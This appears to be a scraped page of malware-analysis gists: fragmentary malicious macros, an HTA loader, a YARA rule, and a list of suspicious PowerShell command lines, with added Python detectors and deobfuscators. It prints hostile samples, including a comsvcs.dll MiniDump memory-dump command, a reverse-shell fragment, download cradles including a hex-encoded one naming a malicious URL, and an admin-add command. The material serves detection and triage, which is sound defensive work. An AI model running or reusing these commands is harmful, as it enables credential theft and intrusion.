This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Declare Function GetLogicalDrives& Lib "kernel32" ()
Declare Function GetShortPathName Lib "Kernel32.dll" Alias _
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" ( _
Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try |
By @JohnLaTwC
References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)
Detection Examples:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
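The detection example above matches the export by name; the @SBousseaden reference shows the same call with the export given by ordinal (`comsvcs,#24`), and rundll32 also accepts a comma instead of a space between DLL and export, mixed case, and a DLL name without its `.dll` extension. The following is an added example of mine, not code from the gist: one pattern that covers those spellings, run over constructed process-creation command lines (the PIDs and dump paths are made up).

```python
import re

# Constructed process-creation command lines (not real telemetry). The first
# mirrors the detection example in the gist, the second the "comsvcs,#24"
# ordinal form, the third a comma-separated export in mixed case; the last two
# are benign rundll32/powershell noise that must not match.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 624 \Windows\Temp\lsass.dmp full',
    r'rundll32.exe comsvcs, #24 624 C:\temp\out.dmp full',
    r'rundll32 c:\windows\system32\COMSVCS.DLL,minidump 624 c:\temp\a.dmp full',
    r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL',
    r'powershell.exe -c Get-Process lsass',
]

MINIDUMP_RE = re.compile(r'''
    rundll32(?:\.exe)?"?\s+              # rundll32, with optional .exe and closing quote
    (?:[A-Za-z]:\\[^\s,]*?\\)?           # optional drive path in front of the DLL
    comsvcs(?:\.dll)?                    # extension may be omitted (LoadLibrary appends it)
    \s*,?\s*                             # export separator: comma, spaces, or both
    (?P<export>minidump|\#24)            # export by name or by ordinal 24
    \s+(?P<pid>\d+)                      # target process id
    \s+(?P<dump>\S+)                     # output dump path
    \s+full\b                            # dump type argument, as in the gist's example
''', re.IGNORECASE | re.VERBOSE)


def detect_comsvcs_minidump(cmdline):
    """Return details of a comsvcs.dll MiniDump invocation, or None if benign."""
    m = MINIDUMP_RE.search(cmdline)
    if not m:
        return None
    export = m.group('export')
    return {
        'export': 'MiniDump (ordinal #24)' if export.startswith('#') else 'MiniDump',
        'pid': int(m.group('pid')),
        'dump_path': m.group('dump'),
    }


def scan(cmdlines):
    """Run the detector over a list of command lines and return the hits."""
    hits = []
    for line in cmdlines:
        details = detect_comsvcs_minidump(line)
        if details:
            hits.append((line, details))
    return hits


if __name__ == '__main__':
    for line, details in scan(SAMPLE_CMDLINES):
        print(details, '<-', line)
```

The pattern only sees the command line, so the PID it extracts still has to be joined against the process list to confirm the target is lsass.exe; the `full` argument is anchored exactly as the gist's example writes it, so loosen that if your telemetry shows other spellings.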
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public RUNNING As Boolean |
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long |
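The Declare statements in the first gist above hide LoadLibraryW behind the names Keio2, VEEAAM2 and wspPush2 through the Alias clause, and the ExpandString declaration here does the same for ExpandEnvironmentStringsA, so a keyword scan for the real API name sees nothing. The following is an added example of mine, not code from either gist or from olevba: a parser for VBA Declare lines that handles the line continuation (` _`), the type-suffix form (`GetLogicalDrives&`) and PtrSafe, and reports the real import behind every alias. The sample text reuses the gists' own declarations (the ExpandString one split across a continuation line to exercise the joiner), and the list of APIs worth flagging is my own judgement.

```python
import re

# Declare statements copied from the macros quoted above (constructed sample
# text; the last one is split over a continuation line on purpose).
SAMPLE_VBA = '''
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Declare Function GetLogicalDrives& Lib "kernel32" ()
Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare PtrSafe Function ExpandString Lib "kernel32" _
    Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long
'''

# Judgement list (my assumption, not a standard): imports that in a document
# macro usually mean loader / injector / dropper behaviour.
SUSPICIOUS_APIS = {
    'loadlibrarya', 'loadlibraryw', 'loadlibraryexa', 'loadlibraryexw', 'getprocaddress',
    'virtualalloc', 'virtualallocex', 'virtualprotect', 'writeprocessmemory',
    'createthread', 'createremotethread', 'rtlmovememory', 'globalalloc', 'globallock',
    'expandenvironmentstringsa', 'expandenvironmentstringsw',
    'urldownloadtofilea', 'urldownloadtofilew', 'shellexecutea', 'shellexecutew',
    'winexec', 'createprocessa', 'createprocessw',
}

DECLARE_RE = re.compile(r'''
    ^\s*(?:(?:Public|Private)\s+)?Declare\s+
    (?P<ptrsafe>PtrSafe\s+)?
    (?P<kind>Function|Sub)\s+
    (?P<name>\w+)[%&!\#$@]?\s+           # VBA type-suffix char is allowed on the name
    Lib\s+"(?P<lib>[^"]+)"
    (?:\s+Alias\s+"(?P<alias>[^"]+)")?
''', re.IGNORECASE | re.VERBOSE)


def join_continuations(text):
    """Join physical lines ending in ' _' into logical VBA lines."""
    logical, buf = [], ''
    for line in text.splitlines():
        stripped = line.rstrip()
        if stripped.endswith('_') and stripped[:-1].endswith(' '):
            buf += stripped[:-1]
        else:
            logical.append(buf + line)
            buf = ''
    if buf:
        logical.append(buf)
    return logical


def parse_declares(vba_text):
    """Return one record per Declare, with the real API name resolved through Alias."""
    found = []
    for line in join_continuations(vba_text):
        m = DECLARE_RE.match(line)
        if not m:
            continue
        alias = m.group('alias')
        api = alias or m.group('name')
        found.append({
            'name': m.group('name'),
            'lib': m.group('lib'),
            'api': api,
            'ptrsafe': m.group('ptrsafe') is not None,
            'renamed': alias is not None and alias.lower() != m.group('name').lower(),
            'suspicious': api.lower() in SUSPICIOUS_APIS,
        })
    return found


if __name__ == '__main__':
    for d in parse_declares(SAMPLE_VBA):
        flag = '!' if d['suspicious'] else ' '
        print(f"{flag} {d['name']:<20} -> {d['lib']}!{d['api']}" + ('  (renamed)' if d['renamed'] else ''))
```

Reporting on the resolved `api` rather than the declared `name` is what defeats the renaming: three differently named declarations collapse to one LoadLibraryW import, which is the fact worth surfacing in triage.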
rule gen_injected_template_Word
{
meta:
description = "Detects injected templates in DOCX"
author = "John Lambert @JohnLaTwC"
date = "2020-05-03"
hash1 = "a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063"
hash2 = "a275dfa95393148bb9e0ddf5346f9fedcc9c87fa2ec3ce1ec875843664c37c89"
hash3 = "ed4835e5fd10bbd2be04c5ea9eb2b8e750aff2ef235de6e0f18d369469f69c83"
file_protocol_hash1 = "ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08 (settings.xml.rels)" |
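The rule's strings and condition are cut off above, but its meta already names the artifact: a `settings.xml.rels` part whose attachedTemplate relationship points outside the document, over http or, as in `file_protocol_hash1`, over the file protocol. The following is an added example of mine, not the YARA rule and not JohnLaTwC's code: a Python check that unzips a DOCX, walks every `.rels` part, and classifies external attachedTemplate targets. The DOCX it inspects is constructed in memory (the hostnames and paths are made up), and the remote/local split is my own reading of what Word would fetch off-host.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = 'http://schemas.openxmlformats.org/package/2006/relationships'
ATTACHED_TEMPLATE = ('http://schemas.openxmlformats.org/officeDocument/2006/'
                     'relationships/attachedTemplate')


def build_sample_docx(template_target):
    """Construct a minimal DOCX-shaped zip in memory (test input, not a real
    sample) whose word/_rels/settings.xml.rels attaches an external template."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('[Content_Types].xml', '<Types/>')
        z.writestr('word/document.xml', '<document/>')
        z.writestr('word/settings.xml', '<settings/>')
        z.writestr('word/_rels/settings.xml.rels', rels)
    return buf.getvalue()


def classify_target(target):
    """'remote' for targets Word would fetch off-host, otherwise 'local'."""
    u = urlparse(target)
    scheme = u.scheme.lower()
    if scheme in ('http', 'https', 'ftp'):
        return 'remote'
    if scheme == 'file':
        # file://server/share/x.dotm and file://///server/share/x.dotm are UNC
        # paths (the hash1 "file protocol" case); file:///C:/... stays on disk.
        return 'remote' if (u.netloc or u.path.startswith('//')) else 'local'
    if target.startswith('\\\\'):
        return 'remote'
    return 'local'


def find_injected_templates(docx_bytes):
    """List every external attachedTemplate relationship in the package,
    whichever .rels part carries it, with a remote/local classification."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith('.rels'):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f'{{{REL_NS}}}Relationship'):
                if rel.get('Type') != ATTACHED_TEMPLATE:
                    continue
                if rel.get('TargetMode', '').lower() != 'external':
                    continue
                target = rel.get('Target', '')
                findings.append({'part': name, 'target': target,
                                 'classification': classify_target(target)})
    return findings


def is_template_injection(docx_bytes):
    return any(f['classification'] == 'remote' for f in find_injected_templates(docx_bytes))


if __name__ == '__main__':
    doc = build_sample_docx('http://templates.example/remote.dotm')
    print(find_injected_templates(doc), is_template_injection(doc))
```

A legitimate document saved from a custom template also carries an external attachedTemplate, normally a `file:///C:/Users/.../Templates/x.dotm` path, which is why the check keys on where the target resolves rather than on the relationship's mere presence.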
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
## Sample hash:
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c
## http://moveis-schuster-com.ga/Order.jpg returns:
Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63
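The command lines in the "suspicious PowerShell commands" gist above and the Order.jpg response here show two encodings an analyst has to peel before the indicators become visible: `-e` followed by base64 of UTF-16LE text (decoding to `iex ((` in the gist), and a `$asciiChars` string of hex bytes whose decoded text then hides `IEX`, `GCM *W-O*` (Get-Command resolving New-Object by wildcard) and `Net.WebClient.DownloadFile` behind `.replace()` and `+` concatenation of literals. The following is an added example of mine, not code from either gist: a triage function that decodes both layers, folds literal-only `.replace()`/`+`/parenthesised expressions, resolves `sal` aliases to their values, and flags the behaviours the gist lists. The hex sample is the Order.jpg response quoted above, cut where the gist is cut, so its decoded tail is truncated too; the base64 sample and the other command lines are constructed (TEST-NET addresses, made-up account names), and the indicator list is my own.

```python
import base64
import binascii
import re

# Constructed samples. B64_SAMPLE encodes a known cradle the way powershell -e
# expects (UTF-16LE, base64). HEX_SAMPLE is the Order.jpg response quoted
# above, exactly as the gist shows it (the hex string is cut mid-URL).
B64_PLAINTEXT = "iex ((New-Object Net.WebClient).DownloadString('http://203.0.113.5:8080/a'))"
B64_SAMPLE = 'powershell -w 1 -exec bypass -e ' + base64.b64encode(B64_PLAINTEXT.encode('utf-16-le')).decode()
HEX_SAMPLE = ("Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63")
OTHER_SAMPLES = [
    "powershell.exe -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('203.0.113.5',4444)\"",
    "powershell.exe -c Add-LocalGroupMember -Group Administrators -Member svc_backup",
    "powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber",
]

# -e / -ec / -enc / -encodedcommand (PowerShell accepts any unambiguous prefix;
# these are the usual spellings) followed by the base64 blob.
ENC_RE = re.compile(r'(-e(?:c|nc|ncodedcommand)?\s+)([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
# $asciiChars='24 54 ...' ; closing quote optional because the sample is truncated.
HEX_RE = re.compile(r"\$asciiChars\s*=\s*'((?:[0-9A-Fa-f]{2}\s*)+)'?")


def decode_encoded_command(cmdline):
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode('utf-16-le')
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_hex_chars(cmdline):
    m = HEX_RE.search(cmdline)
    return bytes.fromhex(m.group(1)).decode('ascii', errors='replace') if m else None


# Constant folding for literal-only expressions: 'a'.replace('b','c'), +('lit'), 'a'+'b'.
REPLACE_LIT = re.compile(r"'([^']*)'\.replace\('([^']*)','([^']*)'\)", re.IGNORECASE)
PAREN_AFTER_PLUS = re.compile(r"(\+\s*)\(('[^']*')\)")
PAREN_BEFORE_PLUS = re.compile(r"\(('[^']*')\)(\s*\+)")
CONCAT_LIT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def fold_literals(code):
    prev = None
    while prev != code:
        prev = code
        code = REPLACE_LIT.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", code)
        code = PAREN_AFTER_PLUS.sub(r'\1\2', code)
        code = PAREN_BEFORE_PLUS.sub(r'\1\2', code)
        code = CONCAT_LIT.sub(r"'\1\2'", code)
    return code


ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
SAL_RE = re.compile(r"\b(?:sal|set-alias)\s+(\w+)\s+(\$?\w+)", re.IGNORECASE)


def resolve_aliases(code):
    """Map alias names created with sal/Set-Alias to their (literal) targets."""
    assigns = dict(ASSIGN_RE.findall(code))
    aliases = {}
    for name, target in SAL_RE.findall(code):
        aliases[name] = assigns.get(target[1:], target) if target.startswith('$') else target
    return aliases


INDICATORS = {name: re.compile(p, re.IGNORECASE) for name, p in {
    'hidden-window': r'-w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b',
    'execution-policy-bypass': r'-exec(?:utionpolicy)?\s+bypass\b',
    'invoke-expression': r'\biex\b|invoke-expression',
    'set-alias': r'\b(?:sal|set-alias)\s+\w+',
    'download-cradle': r'net\.webclient|downloadstring|downloadfile',
    'wildcard-cmdlet': r'\bgcm\s+\S*\*|get-command\s+\S*\*',
    'reverse-shell': r'net\.sockets\.tcpclient',
    'local-admin-add': r'add-localgroupmember|s-1-5-32-544',
    'host-fingerprint': r'win32_(?:bios|physicalmedia|computersystemproduct)',
    'url': r'https?://[^\s\'")]+',
}.items()}


def triage(cmdline):
    """Decode what can be decoded, fold literals, and list the indicators seen."""
    layers = [ENC_RE.sub(r'\1<base64>', cmdline)]   # never pattern-match the raw blob
    hits = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add('encoded-command')
    else:
        decoded = decode_hex_chars(cmdline)
    if decoded is not None:
        layers += [decoded, fold_literals(decoded)]
    blob = '\n'.join(layers)
    hits |= {name for name, rx in INDICATORS.items() if rx.search(blob)}
    return {'layers': layers, 'indicators': sorted(hits), 'aliases': resolve_aliases(layers[-1])}


if __name__ == '__main__':
    for sample in [B64_SAMPLE, HEX_SAMPLE] + OTHER_SAMPLES:
        r = triage(sample)
        print(r['indicators'], r['aliases'], r['layers'][-1][:80])
```

On the Order.jpg sample the folded layer reads `$TRP='IEX'; sal Master $TRP;'(&(GCM *W-O*)Net.WebClient).DownloadFile(''http://moveis-schuster-c`, so `Master` resolves to IEX and the cradle is plain to see; the folder only touches literal-only expressions, leaving anything with variables or method calls on non-literals untouched, which is the right failure mode for a static pass.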
## Uploaded by @JohnLaTwC
## Sample hash: d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc / 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls |
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't. |